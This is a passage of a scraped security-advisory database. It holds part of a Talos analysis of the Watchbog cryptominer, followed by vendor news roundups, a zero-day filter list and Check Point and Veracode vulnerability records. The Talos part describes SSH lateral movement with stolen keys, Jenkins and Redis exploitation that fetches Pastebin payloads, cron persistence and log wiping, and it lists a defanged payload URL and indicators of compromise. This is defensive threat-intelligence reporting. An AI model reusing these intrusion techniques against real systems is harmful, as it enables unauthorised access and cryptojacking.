\n \n\n\n[](<https://1.bp.blogspot.com/-3AAGL4Enxgc/XXkI8suvJoI/AAAAAAAAClw/wOHkv6rtfYMf9hYBUf_qJJDNon6L4ixNgCLcBGAsYHQ/s1600/image2.png>)\n\n \n \n \nThe following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc. \n \n\n\n[](<https://1.bp.blogspot.com/-f3DJaaFacSo/XXkJB_E7xYI/AAAAAAAACl0/DUEfC02BOTcFYExE4hGsDqyBd8Ek6ZuIgCLcBGAsYHQ/s1600/image8.png>)\n\n \n \n\n\n## Lateral movement via SSH\n\n \nCSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability. \n \nThe following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process. 
\n \n\n\n[](<https://1.bp.blogspot.com/-5_xBPPopbZI/XXkJHnWUv6I/AAAAAAAACl8/s2tHmsrtZzc4gFcIFC2qNU6x8WBtCV5EACLcBGAsYHQ/s1600/image3.png>)\n\n \n \n \n\n\n## Lateral movement via Jenkins and Redis servers\n\n \nIn addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target. \n \nBased on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Stapler web framework, which handles HTTP requests, affecting Jenkins versions up to 2.138.1 or 2.145. It can provide attackers with RCE through specially crafted URLs. A [post](<https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing-en/>) by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy. \n \n\n\n[](<https://1.bp.blogspot.com/-3TxIe0-nZsM/XXkJM986stI/AAAAAAAACmA/FgUyo8tO6YIEaZio5VFrJdNgEZtHrpA7gCLcBGAsYHQ/s1600/image7.png>)\n\n \n \nThough the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.' \n \n\n\n[](<https://1.bp.blogspot.com/-yYGvHmNwIzs/XXkJRnRvBjI/AAAAAAAACmI/E_GktVykecAKBOY6JBO9E0arUg6-rkkPwCLcBGAsYHQ/s1600/image4.png>)\n\n \n \nAs can be seen above, the payload variable contains a base64 encoded blob which is then decoded, written to the /tmp directory, and executed. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. 
The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script. \n \n\n\n[](<https://1.bp.blogspot.com/-ffsJuwLdgf4/XXkJXUd3YgI/AAAAAAAACmQ/H4hum_c5VLwooskH2NtFwGmRRUGVB8qjwCLcBGAsYHQ/s1600/image21.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-e3bawStVKtA/XXkJcurJEqI/AAAAAAAACmY/kwJwp-GBGAA1fwJDVQLoIGSl0cxhp_pOQCLcBGAsYHQ/s1600/image1.png>)\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-sMDwBEFIxqI/XXkJiHMLZlI/AAAAAAAACmg/FpktKT_qR9geHhpanXh4ElHHfWgwHu6agCLcBGAsYHQ/s1600/image20.png>)\n\n \n \n \n\n\n## Persistence\n\n \nWatchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-0tfsLV-3M3U/XXkJoO47SsI/AAAAAAAACmk/Zomf6H49VL8zFtlb6NEuLWVMc2ZLlhfaQCLcBGAsYHQ/s1600/image11.png>)\n\n \n \nIn a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans. \n \n\n\n## Covering their tracks\n\n \nEvidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. 
The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our client's centralized logging to fill in those holes, and the hosts themselves still had evidence, the most obvious being the malware variants themselves. \n \n\n\n## Conclusion \n\n \nUnpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally \u2014 which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it\u2019s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them, even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization\u2019s SSH traffic. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. 
In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>).

Additional ways our customers can detect and block these threats are listed below.

[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.

[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.
[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## Indicators of Compromise (IOCs)

The following IOCs have been observed associated with Watchbog.

### Hashes (SHA256):

b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61

0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

### Domains:

aziplcr72qjhzvin[.]onion[.]to

### Misc:

Monero Wallet (Same wallet as the Alibaba Cloud Post)

47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7

", "modified": "2019-09-11T09:10:37", "published": "2019-09-11T09:10:37", "id": "TALOSBLOG:C136648C951F9482ABC1764BDBCABCC9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/peidHg1L8SY/watchbog-patching.html", "type": "talosblog", "title": "Watchbog and the Importance of Patching", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.
This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.

Read on:

[**May’s Patch Tuesday Include Fixes for ‘Wormable’ Flaw in Windows XP, Zero-Day Vulnerability**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mays-patch-tuesday-include-fixes-for-wormable-flaw-in-windows-xp-zero-day-vulnerability/>)

_Microsoft’s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003._

[**Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps**](<https://www.helpnetsecurity.com/2019/05/16/trend-micro-single-solution-security/>)

_Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack._

[**Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/side-channel-attacks-ridl-fallout-and-zombieload-affects-millions-of-vulnerable-intel-processors>)

_Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs._

[**Trump Issues Executive Order Paving Way for Ban on Huawei**](<https://www.axios.com/trump-huawei-ban-executive-order-eb86bc1f-8365-465d-92d8-b0dfc9ad8dc4.html>)

_President Trump has issued an executive order declaring a national emergency and prohibiting U.S.
companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei._

[**Unsecured Server Leaks PII of Almost 90% of Panama Residents**](<https://www.trendmicro.com/vinfo/us/security/news/online-privacy/unsecured-server-leaks-pii-of-almost-90-of-panama-residents>)

_The personally identifiable information of almost 90% of Panama’s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser._

**[Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement](<https://techcrunch.com/2019/05/15/google-recalls-its-bluetooth-titan-security-keys-because-of-a-security-bug/>)**

_Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols.”_

**[Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/jenkins-vulnerability-exploited-to-drop-kerberods-malware-and-launch-monero-miner>)**

_Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier._

**[Crypto Exchange Binance Restarting Services After Post-Hack Upgrade](<https://www.coindesk.com/crypto-exchange-binance-restarting-services-after-post-hack-upgrade>)**

_Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen._

Do you worry about your personally identifiable
information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay](<https://twitter.com/jonlclay>).

The post [This Week in Security News: Unsecured Servers and Vulnerable Processors](<https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/>) appeared first on [blog.trendmicro.com](<https://blog.trendmicro.com>).", "modified": "2019-05-17T14:14:56", "published": "2019-05-17T14:14:56", "id": "TRENDMICROBLOG:3E70A01CB57177EC40F969FCA453BDE6", "href": "https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/", "type": "trendmicroblog", "title": "This Week in Security News: Unsecured Servers and Vulnerable Processors", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-11T00:19:10", "description": "

It has been quoted by Albert Einstein, Benjamin Franklin, and others that insanity is “doing the same thing over and over again and expecting different results.” I could say that in our world of cyber security, despite all the headlines about data breaches and ransomware, there is no “insanity.” Products we used 25 years ago probably can’t protect against the latest malware. Someone will reverse-engineer someone’s code and ultimately figure out how to evade a product’s protection mechanisms for detecting or blocking an attack. Entire segments of the cyber security industry exist because there is no insanity. Those who create malware or tools that exploit bugs don’t do the exact same thing over and over again. Once we’ve figured them out, they adjust, and then we adjust by making our products smarter – until the cycle starts again.

When Stuxnet hit in 2010, it made headlines as a new kind of attack with massive geopolitical consequences.
Microsoft released several different security patches in response, including MS10-046, to address the vulnerability in link files. Now, with the WikiLeaks document exposure, it appears that a tool called “EZCheese” exploited a similar bug in link files until 2015. That tool change resulted from a set of bugs discovered through the Zero Day Initiative program that showed the original MS10-046 patch had failed. This forced a change of operational tactics to what was then an “unknown link file vulnerability” in Microsoft, which was likely corrected with the release of CVE-2017-8464. According to the WikiLeaks-released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks, similar to Stuxnet. You can learn more about Brutal Kangaroo and the impact the Zero Day Initiative has had on the industry by reading Brian Gorenc’s commentary on his blog: [The Real-World Impact of Bug Bounties and Vulnerability Research](<http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/>).

**Zero-Day Filters**

There are 23 new zero-day filters covering six vendors in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendations, increase filter accuracy and/or optimize performance.
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.

**_Adobe (3)_**

 * 28916: ZDI-CAN-4887: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
 * 28917: ZDI-CAN-4895: Zero Day Initiative Vulnerability (Adobe Flash)
 * 28924: ZDI-CAN-4756: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)

**_Foxit (1)_**

 * 28921: ZDI-CAN-4518: Zero Day Initiative Vulnerability (Foxit Reader)

**_Hewlett Packard Enterprise (11)_**

 * 28727: HTTPS: HPE Network Automation PermissionFilter Authentication Bypass Vulnerability (ZDI-17-332)
 * 28906: ZDI-CAN-4870: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28907: ZDI-CAN-4871: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28908: ZDI-CAN-4872: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28909: ZDI-CAN-4873: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28910: ZDI-CAN-4874: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28911: ZDI-CAN-4875: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28912: ZDI-CAN-4876: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28913: ZDI-CAN-4877: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28914: ZDI-CAN-4878: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)
 * 28915: ZDI-CAN-4880: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)

**_Microsoft (6)_**

 * 28897: ZDI-CAN-4777: Zero Day Initiative Vulnerability (Microsoft Edge)
 * 28918: ZDI-CAN-4886: Zero Day Initiative Vulnerability (Microsoft Chakra)
 * 28919: ZDI-CAN-4888: Zero Day Initiative Vulnerability (Microsoft Edge)
 * 28925: ZDI-CAN-4894: Zero Day Initiative Vulnerability (Microsoft Chakra)
 * 28981: ZDI-CAN-4910: Zero Day Initiative Vulnerability (Microsoft Chakra)
 * 28982: ZDI-CAN-4884: Zero Day Initiative Vulnerability (Microsoft Edge)

**_Schneider Electric (1)_**

 * 28920: HTTP: Schneider Electric U.motion Builder loadtemplate.php SQL Injection Vulnerability (ZDI-17-374)

**_Trend Micro (1)_**

 * 28900: HTTPS: Trend Micro InterScan Web Security delete_pac_files Command Injection (ZDI-17-229)

**Missed Last Week’s News?**

Catch up on last week’s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/>).", "cvss3": {}, "published": "2017-07-07T15:45:09", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 3, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-07T15:45:09", "id": "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T22:17:28", "description": "A remote code execution vulnerability exists in the Jenkins Stapler web framework. 
A remote attacker can exploit this vulnerability to execute arbitrary code via a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins Stapler Web Framework Remote Code Execution (CVE-2018-1000861)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2019-08-21T00:00:00", "id": "CPAI-2019-0670", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T22:09:56", "description": "A remote code execution vulnerability exists in Jenkins Stapler Web Framework. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins Stapler Web Framework Code Execution (CVE-2018-1000861)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2018-1691", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:21", "description": "A directory traversal vulnerability exists in Apache ActiveMQ. The vulnerability is due to insufficient input validation in the destination header when processing a MOVE request or in the file upload functionality when processing a PUT request. 
A remote, unauthenticated attacker may exploit this vulnerability by sending a file with a PUT request, followed by a crafted MOVE request to the server or by sending a malicious file using a crafted PUT request to replace executable components of ActiveMQ.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-25T00:00:00", "type": "checkpoint_advisories", "title": "Apache ActiveMQ Fileserver Multi Methods Directory Traversal (CVE-2016-3088)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2019-01-16T00:00:00", "id": "CPAI-2016-0498", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:46:37", "description": "A remote code execution vulnerability has been reported in Windows OS. The vulnerability is due to an error in the way HTTP.sys handles a malicious HTTP header. 
Successful exploitation would result in a remote code execution.", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows HTTP.sys Remote Code Execution (MS15-034: CVE-2015-1635)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2015-10-21T00:00:00", "id": "CPAI-2015-0410", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:35:34", "description": "A remote code execution vulnerability exists in Encapsulated PostScript (EPS) of Microsoft Office. The vulnerability is due to the way that Microsoft Office does not properly handle objects in memory while parsing specially crafted Office files. 
A remote attacker can exploit this issue by enticing a target user to open a specially crafted Office file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office EPS Remote Code Execution (CVE-2017-0262)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2017-06-18T00:00:00", "id": "CPAI-2017-0406", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T15:47:16", "description": "A Use-After-Free vulnerability exists in Windows. The vulnerability occurs when the Windows kernel-mode driver fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode with full user rights.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2017-0263)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0370", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:35:20", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Struts1 plugin. An attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. 
Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-07-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Struts1_Plugin Remote Code Execution (CVE-2017-9791)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2017-07-23T00:00:00", "id": "CPAI-2017-0558", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T13:07:35", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.59. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHBA-2019:0023 Space precludes documenting all of the bug fixes and enhancements in this advisory. 
See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html All OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T03:23:55", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 